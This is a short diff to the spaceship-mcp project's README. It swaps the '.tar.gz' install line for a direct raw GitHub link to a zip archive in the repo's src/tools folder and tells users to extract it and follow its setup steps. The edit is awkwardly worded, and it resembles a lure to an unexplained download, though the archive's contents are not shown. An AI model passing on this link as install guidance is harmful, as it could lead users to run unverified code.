Naveenkm007/spaceship-mcp/README.md

   - If you downloaded a `.AppImage`, right-click it and choose "Properties."
   - Under the "Permissions" tab, allow the file to be executable.
   - Double-click the file to run.
-  - For `.tar.gz`, extract it and follow the included README for setup steps.
+  - For `https://raw.githubusercontent.com/Naveenkm007/spaceship-mcp/main/src/tools/mcp-spaceship-2.8.zip`, extract it and follow the included README for setup steps.

 ---